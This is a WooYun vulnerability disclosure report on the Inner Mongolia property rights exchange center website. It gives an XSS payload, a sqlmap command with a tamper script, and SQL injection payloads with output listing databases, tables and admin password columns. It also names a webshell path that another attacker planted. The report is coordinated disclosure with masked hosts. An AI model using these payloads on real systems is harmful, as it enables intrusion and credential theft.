当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160105

漏洞标题:内蒙古产权交易中心漏洞打包

相关厂商:内蒙古产权交易中心

漏洞作者: BlackWolf

提交时间:2015-12-16 23:02

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

内蒙古产权交易中心存在SQL注入、XSS、铭感目录非授权浏览。还有发现网站已被别人getshell(见最后一张图)

详细说明:

1、XSS漏洞
主页搜索框 http://**.**.**.**
输入: ><script>alert("1")</script><

1.png


2、铭感目录浏览

3.png


4.png


3、爆出绝对路径

5.png


4、注入:

注入点:http://**.**.**.**/newsfb/symore.asp?cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1
对空格屏蔽所以sqlmap构造一下语句:
sqlmap.py -u "http://**.**.**.**/newsfb/symore.asp?cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1" --tamper "space2comment" 
漏洞点:
Parameter: xldid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1 AND 6674
=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(106)+CHAR(113)+(SELECT (CAS
E WHEN (6674=6674) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+
CHAR(118)+CHAR(113)))
    Type: UNION query
    Title: Generic UNION query (NULL) - 32 columns
    Payload: cid=1735&did=&id=0&kyly=&lxid=&sjid=&snr=&sxz=&vcd=0&xldid=1 UNION AL
L SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L,CHAR(113)+CHAR(122)+CHAR(98)+CHAR(106)+CHAR(113)+CHAR(104)+CHAR(115)+CHAR(70)+CH
AR(77)+CHAR(77)+CHAR(72)+CHAR(103)+CHAR(104)+CHAR(84)+CHAR(106)+CHAR(113)+CHAR(90)
+CHAR(78)+CHAR(68)+CHAR(106)+CHAR(73)+CHAR(77)+CHAR(73)+CHAR(74)+CHAR(83)+CHAR(110
)+CHAR(66)+CHAR(78)+CHAR(74)+CHAR(86)+CHAR(72)+CHAR(73)+CHAR(115)+CHAR(85)+CHAR(82
)+CHAR(114)+CHAR(113)+CHAR(106)+CHAR(110)+CHAR(88)+CHAR(114)+CHAR(65)+CHAR(101)+CH
AR(79)+CHAR(74)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
库名
available databases [7]:
[*] master
[*] model
[*] msdb
[*] nmcqjy_com
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
表名:
Database: nmcqjy_com
[26 tables]
+---------------------+
| D99_CMD             |
| D99_Tmp             |
| admin               |
| class               |
| content             |
| dx_data             |
| fzlb                |
| hyzc                |
| info                |
| kjtjsq              |
| lyb                 |
| n_tab01             |
| n_tab02             |
| n_tab03             |
| n_tab04             |
| pangolin_test_table |
| rscmm               |
| tab01               |
| tab02               |
| tab03               |
| tab04               |
| tab05               |
| tab06               |
| tab07               |
| tab08               |
| tab09               |
+---------------------+
admin表的列名:
Database: nmcqjy_com
Table: admin
[11 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| bmjf        | int      |
| bmpd        | int      |
| dwbm        | nvarchar |
| dwmc        | nvarchar |
| flag        | int      |
| id          | int      |
| LastLoginIP | nvarchar |
| nwwebid     | int      |
| password    | nvarchar |
| username    | nvarchar |
| wzjsp       | int      |
+-------------+----------+
注入就到处为止


漏洞证明:

注入证明:

7.png


只做测试,准备结束发现下面这个(别人的):
http://**.**.**.**/fmzcczpt/inc/bin.asp

8.png


明显被黑了很久了,希望网站管理者好好彻底清查一遍吧!毕竟产权交易中心影响很大…………………………

修复方案:

过滤,增加文件路径浏览权限,彻底清查网站吧!

版权声明:转载请注明来源 BlackWolf@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-18 10:38

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发内蒙古分中心,由其后续协调网站管理单位处置。

最新状态:

暂无